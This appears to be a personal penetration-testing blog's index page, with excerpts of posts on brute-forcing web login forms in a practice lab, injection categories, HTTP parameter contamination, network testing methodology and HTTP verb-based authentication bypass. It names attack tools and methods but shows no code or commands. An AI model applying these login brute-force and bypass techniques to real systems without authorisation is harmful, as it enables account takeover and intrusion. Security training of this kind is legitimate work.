Protected: Real World Penetration Testing: A gh0st from Offensive Security

This content is password protected. To view it please enter your password below:

Advertisements

Breaking the Application with Shritam Bhowmick – Application Bruteforce Demystified.

Web Form Brute Force Methods

Demonstration by Shritam Bhowmick
Web Application Penetration Tester
Independent Consulting Security Evangelist

Abstract

This is web application penetration testing challenges hosted over pentesteracademylab.appspot.com, it reflects several challenges for web application security researchers to break in a safe environment. This is for Lab practice only and no part of this document were provided by the original authors. Having to pull out my old research on application security, I thought to give back to the community but not all releases are meant to be pushed here. This research is part of my private application security research and proudly serves as an opening opportunities for others to dwell and work further on the same as provided and as long as the original authors are credited.

Contents

Hack.
Method 1: Using Hydra to Brute Force Web Logins
Method 2: Using Burp Suite Intruder to Brute Force Web Logins

Method 3: Using Python to break Web-Form Login
Method 4: Using WebSlayer to Brute Force Web Logins
Method 5: Nmap Script Code to break web form
Contact Information.

Continue reading

Shritam Bhowmick Explains Shell Injection v/s Remote Code Execution v/s Code Injection – Yes, they are Different!

Shell Injection v/s Remote Code Execution v/s Code Injection

By Shritam Bhowmick
Web Application Penetration Tester
LinkedIn: https://www.linkedin.com/profile/view?id=281014248&trk=nav_responsive_tab_profile
Academia: https://independent.academia.edu/ShritamBhowmick
Facebook: https://www.facebook.com/coded32

The Bare Beginning

I promised to deliver yet another quality content on my blog and as promised after this particular post, my true intentions were to go ahead with posting something deep on HTTP Parameter Pollution. Looking at the awareness level (read the comments for a deep approach insight on application security!) of incoming proclaimed security researchers or bug hunters, I recently decided to make my point across and let the info-sec community know the real concepts behind Application Injection vulnerabilities. This post is focused to switch off the ego gap and provide a platform for others to realize core concepts and the necessity of such concepts to be applicable to adaptive application penetration testing!

I quickly realized the core necessity of a distinguished vulnerability levels according to their categorization and be real technical about the application security issue, most focused primarily on this post on Injection level web vulnerabilities which are very common if dug enough into. On a recent conversation with many of ‘elite’ bug hunters, I noticed, there is a huge gap on the technical consciousness level they possess and likely end up only getting T-shirts for the sake of name on Hall of fame (No pun intended!). Money would encircle you girls, knowledge will encircle you girls, cars, super-bikes and alike!

Continue reading

Shritam Bhowmick Explains HTTP Parameter Contamination

HTTP Parameter Contamination

By Shritam Bhowmick
Web Application Penetration Tester
LinkedIn: https://www.linkedin.com/profile/view?id=281014248&trk=nav_responsive_tab_profile
Academia: https://independent.academia.edu/ShritamBhowmick
Facebook: https://www.facebook.com/coded32

Earlier on my previous post about Enterprise HTTP Security, I described how HTTP Security is a fine clockwork for an application penetration tester; this post would look into deeper aspect of HTTP Security and how logical manipulation of HTTP could be potentially used by an attacker to manifest the underlying application level vulnerabilities bypassing any security restrictions which were in place originally.

In terms of application development during the standard phases, multi-tier application architecture is prevalent. The multi-tier architecture is a client-server architecture, where the presentation, the application processing and the data management is a complete separate processes. In basic terms, the multi-tier architecture are convenient for developers. The reason they are convenient for developers is the fact that developers have to re-use code and develop applications in which the whole application framework needn’t have to be written all over again. They could only modify parts of the application architecture based on tiers and profit flexibility in the use of such applications. The unfortunate part is the handling of the same data over multiple platform can lead to security breach, or leave the application vulnerable. Logical errors are triggered this way and are completely different from Injection based attacks such as:

  • LDAP/Blind LDAP Injections
  • XML Injection
  • HTML Injection
  • SQL Injection
  • ORM based Injection
  • Spring Injection/nHibernate Injection
  • Xpath Injection
  • Command Injection

All of the above mentioned ‘injection’ variants fall into code level application vulnerabilities and is completely different from ‘logical’ vulnerabilities which still have a greater level of impact on the web applications. During my old research at early phases of dissection behavioral pattern of different platform based application on different web-architectures, I found these led to couple of logical based vulnerabilities which could be used by an attacker for benefits. This lead self-curiosity to further research and I came up concluding something which already existed called ‘HTTP Parameter Contamination or HPC’. During my research at Defencely, I found out this particular attack methodology does not only rely on a specific platform but is widely used across many other different web based platforms, such as PHP on Apache, ASP.NET on IIS, etc.

Continue reading

Enterprise HTTP Security Inspection for Realistic Application Security

The need for HTTP Security Inspection on Application Security

By Shritam Bhowmick
Web Application Penetration Tester
LinkedIn: https://www.linkedin.com/profile/view?id=281014248&trk=nav_responsive_tab_profile
Academia: https://independent.academia.edu/ShritamBhowmick
Facebook: https://www.facebook.com/coded32

Application Layer – HTTP from the Security Perspective

An Application Layer is the first layer which need a security check which just goes beyond any other common checks. Somehow, automated scanners might do this as pre-defined in the programmed logic, but most of them fail to find the bugs which passes through the HTTP Handler and hence create critical vulnerabilities for business enterprise. Yes, I had been talking about Hyper Text Transfer Layer Protocol, which is by now the most common, wildly wide used text based protocol around the internet. Web Applications use the text based protocol since it’s easier to implement and handle parallel requests. The Web Server handles these requests which are made by the clients and penetration testers often ignore a variety of checks against HTTP from the security perspective. Once, an application penetration is fairly grown studying HTTP at a deep level, he/she could already understand why a particular request could be manipulated by client side proxy in multiple of ways and produce a critical security bypass.

Before I jump into concluding the security aspects of the Hyper Text Transfer Protocol, my application security research have shown a comprehensive study of where to start from HTTP from the security standpoint. This question has been asked a lot of times and people have failed to come up with an exact method to detail everything in one book or post. This study is more of a guideline for application penetration testers rather than a reference study; but either way it could be used both the ways. I had prepared a standard draft for HTTP Security Research in topic segments which if wished could be sub-categorized but for the sake of the reference and a guide, I have detailed them into modular topics which could be used by any application security researcher, bug hunter, or application security enthusiast for their own analysis.

badlyart

Continue reading

Fine Tuning Adaptive Network Penetration Test – External, Internal and Wireless

Fine Tuning Automation for Network Penetration Test

By Shritam Bhowmick
Web Application Penetration Tester
LinkedIn: https://www.linkedin.com/profile/view?id=281014248&trk=nav_responsive_tab_profile
Academia: https://independent.academia.edu/ShritamBhowmick
Facebook: https://www.facebook.com/coded32

Network Penetration Testing

A lot has been discussed earlier related to network penetration test in forums, IRC’s and security conferences but everyone looked for some automated approach to keep network penetration test related task going fast. The fast approach is desired for mass IP scans and lot of IP ranges which have to be tested in a short time. Most of these network nodes have services open which could be further investigated if these services were well known to be exploited in the wild.

networktest

There are various Network Penetration testing which could be referenced below:

  1. External Network Penetration Testing
  2. Internal Network Penetration Testing
  3. Wireless Network Penetration Testing

Now as most of you had already assumed, there could be automated approach to all of them; this however seems easy but is harder if taken from a wide security view-point. The art of choosing a set tools at your disposal for Network Security Audit lies beyond the scope defined since lot of these tools send malicious packets which could deliver stress to the web-server or critical production server costing the clients financially off their services. As a penetration tester I have learned this art from my own lesson and experiences and this would be my own personal methodology for a Network penetration test. Some of the questions which should be asked before-hand to the client before beginning with an engagement would be the major feedback on how one should be preparing for the penetration test.

Continue reading

Adaptive Application Framework Driven Vulnerabilities and the Padding Oracle

Securing Web Applications before Deployment.

An analysis focused on various framework used to deploy web applications.

By Shritam Bhowmick
Web Application Penetration Tester
LinkedIn: https://www.linkedin.com/profile/view?id=281014248&trk=nav_responsive_tab_profile
Academia: https://independent.academia.edu/ShritamBhowmick
Facebook: https://www.facebook.com/coded32

Abstract

Dedicated vulnerability and bug researchers go deep into the application security aspects while studying application internals and there is a prominent rise in hidden attack vectors which are never common. There is a default common misconception among the developers that deploying applications which are vendor-enabled with 3rd party proprietary framework libraries will add security to the application. Libraries which the developers rely on are themselves vulnerable if properly dissected and studied. This brings business concerns to the business assets. The business assets could be anything from bank details to storing credit card information for customers to easily access such numbers for the ease of the customers. Although data integrity is maintained when storing and is encrypted, it takes a while for an attacker to get in and get out without being really noticed. Contrary to the statements above, there is yet another belief that Open source libraries will be safer since they go revisions by the mass community but the truth is bitter. Again, deep down in the open-source libraries, there exist multiple critical vulnerabilities which needs to be addressed before deploying them as they are. The information given below will detail the vulnerabilities which are deep inside the libraries which are used to deploy rich internet based applications.

open2 open

What Developers see as a convenient way for deploying a web application?

  • Languages used: PHP, JAVA, Ruby, SCALA, Perl, Python, HASKELL, Cold Fusion and more.
  • Framework Used:NET, Zend, CodeIgniter, Spring, Catalyst, Snap, CakePHP, Yii, Fusebox, and more. Even more popular ones are Django, Sinatra, Mason, Pyjamas, Symfony and Grails.

Continue reading

Web Security Threat Prediction

Web Security Threat Prediction

By Shritam Bhowmick
Web Application Penetration Tester
LinkedIn: https://www.linkedin.com/profile/view?id=281014248&trk=nav_responsive_tab_profile
Academia: https://independent.academia.edu/ShritamBhowmick
Facebook: https://www.facebook.com/coded32

Abstract

The Web Security scene has been much complex than ever known and its time various industry take a deeper look to it to gain an in-depth gravity of the situation which affects them directly or in-directly. This could come at a blow and wouldn’t let you know until it’s too late. This post will take you mind blown from the recent predictions in terms of Web Security and will let you inform on the latest web attacks in rise and how such attacks are bad for business as well as reputation let alone financial losses. When we talk about industry, this doesn’t have to be the retail industry; it aims at stretch from the medical appliances to the car manufacturing industry and too low down to the Electronic Cigarette industry. That been said, we will look how various industrial assets which have had their presence and continue to have a presence in the web world affects them directly or indirectly and why Web Security for them is an absolute important factor too big a risk to ignore and compromise with the same.

Prediction 2015

I have come across and defined a statistical background check on as many application attack vectors and evidently from the statistical approach have come up to a very conclusive set of industries which could go bankruptcy as well as reputation loss if Web Security part is ignored. Here we have thrown out some of the industries which have a direct impact on business ignoring Web Security at their end.

  • Medical Department
  • Web Retail Department and Business Assets
  • Opensource Platforms
  • Mobile Devices

1ta

Continue reading

VBAAC Bypass – Verb Based Authentication and Access Control.

This post would be dedicated to VBAAC bypass which is detailed in the ongoing research documentation I had been doing. The part of this series belongs to ‘Web Application Exploitation’ and has been pinned to this post for personal purpose of reference. Work had just exploded and for the need to trace back everything that is being done, everything about the paper goes here. The belongings of this post are entirely devoted for personal research. The blog itself is personal.

What is covered in VBAAC Bypass:

  • Concept of Server Side controls.
  • HTTP RFC’s for ‘verbs’.
  • WebDAV ‘verbs’ or ‘methods’.
  • Access control mechanisms via apache.
  • Configuring Apache to make use of access control mechanism configurations.
  • Using .htaccess file for access control mechanism.
  • Example JSP webserver based web.xml configuration.
  • Example protected resource based .htaccess configuration for apache servers.
  • Snippet application code for VBAAC bypass.
  • Authentication v/s Authorization for apache web-servers
  • Techniques to bypass ‘methods’ or ‘verbs’.
  • Bypass via HEAD
  • Bypass via arbitrary ‘verb’
  • Application server side configuration based ‘verb’ bypass.
  • Defeating Authentication and hence Authorization via verb based bypass techniques.

The entire documentation encircles creating a web application first, prior to bypassing authentication on them. Because URL based authentication are protect resources on ‘Basic’ or ‘Digest’ authentication, a very brief knowledge on HTTP standardized ‘verb’ is provided. This would be required throughout the document processing. A good amount of WebDAV verbs are also provided with attached RFC’s. Samples of the work is attached below and is for private purposes only. The document isn’t public.

 

Verb 0

 

Verb 1

 

Verb 2

 

Verb 3

 

Verb 4

 

Verb 5

 

Had a great day going ahead and improving drafting skills and had been undergoing good grip onto web application penetration testing from within the corporate companies. The point of the research is to bring back the real penetration testing scenario around the general and aware the security eroded cultural mis-aware people out there. Have a great weekend ahead!

Web Form Bruteforcing for Web Applications.

Hi,

This would be yet another post on how to conduct a web form bruteforce attack on a web application using GET method rather than a ‘POST’ request since the application supports ‘GET’ based requests only. This series of research papers on exploitation of targeted web application set up for vulnerability analysis is a series which is conducted for ‘testing’ purposes and for ‘training’.

What’s different with the research?

I have personally went over and deduced ‘several’ ways and just not ‘one’ way to tackle with the web application as a target. This first post and the paper itself will deliver the ‘attack’ using different methods rather than ‘stick’ to one particular method of exploitation. It’s not open to everyone and these papers are being kept private for reasons. Howsoever, this first paper will be public.

What’s not included in the paper?

I have restricted adding additional yet ‘another’ method in the paper for the public domain. This is done to keep the presentation limited to four methods. There are 5 or more possible methods of conducting the same exploitation on the target.

Sample Images of the paper?

Here are some sample images taken from the papers:

 

Sample1

 

Sample 2

 

Sample 3

 

What are some of the methods explained?

Some of the methods explained to bruteforce web form login for targeted web applications includes:

  • Exploitation via crunch password and username generated files
  • Exploitation using burp suite Intruder
  • Exploitation using python script for automation
  • Exploitation using Webslayer by feeding generated dictionaries into the tool.

I have redacted discussing more methods in the paper because the paper itself is supposed to be private for different and various specific reason. Those who are being trained under the ‘Web Application Exploitation’ course have the access to these papers and benefit it.

Where this paper could be downloaded from?

Currently this paper could be downloaded from my personal dropbox, any other changes will not be reflected here, and the original paper is updated much sooner than expected. Download link: https://www.dropbox.com/s/6uebzfzm10db14h/1.%20Web-Form%20Brute%20Force%20Methods.pdf?m=

I am considering to upload these public papers in various ways, so that if one site goes down, it could be accessible for download via another. This is a part of the series of papers to come along. Some of them would be definitely public . Others won’t be.